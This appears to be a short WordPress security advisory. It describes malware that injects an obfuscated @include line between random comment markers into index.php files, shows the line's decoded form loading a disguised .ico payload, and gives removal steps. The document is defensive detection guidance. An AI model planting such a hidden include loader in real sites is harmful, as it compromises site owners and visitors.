If you find the following code in some index.php files included in your WordPress site, you are infected with malware and should be careful.

Malware that alters index.php and is carried out no matter which page of the WordPress site is loaded

If the index.php file contains @include “\057v\151r\164u\141l\0571 and the include statement sandwiched between comments such as /*963c2*/ above and below, the code is for loading the malware itself.

This code is obfuscated, and when unobfuscated, it will look like the following string.

@(include "/virtual/.24b5f368.ico");.

This code loads the malware body, .24b5f368.ico, and causes the site to perform malicious actions, such as redirecting the site to another site.

The random string of /*963c2*/ comments included at the top and bottom are for hackers to see if they have already embedded malware in that file.

Coping Methods

If you find such a file on your site, immediately delete the line containing @(include “/virtual/” and the random string comments above and below, and re-upload index.php.

Additionally,
We also recommend that you run a site-wide file and database malware scan with the [ Free] WordPress: Malware Scanning & Security Plug-in [Malware and Virus Detection and Removal].

Change user passwords, etc.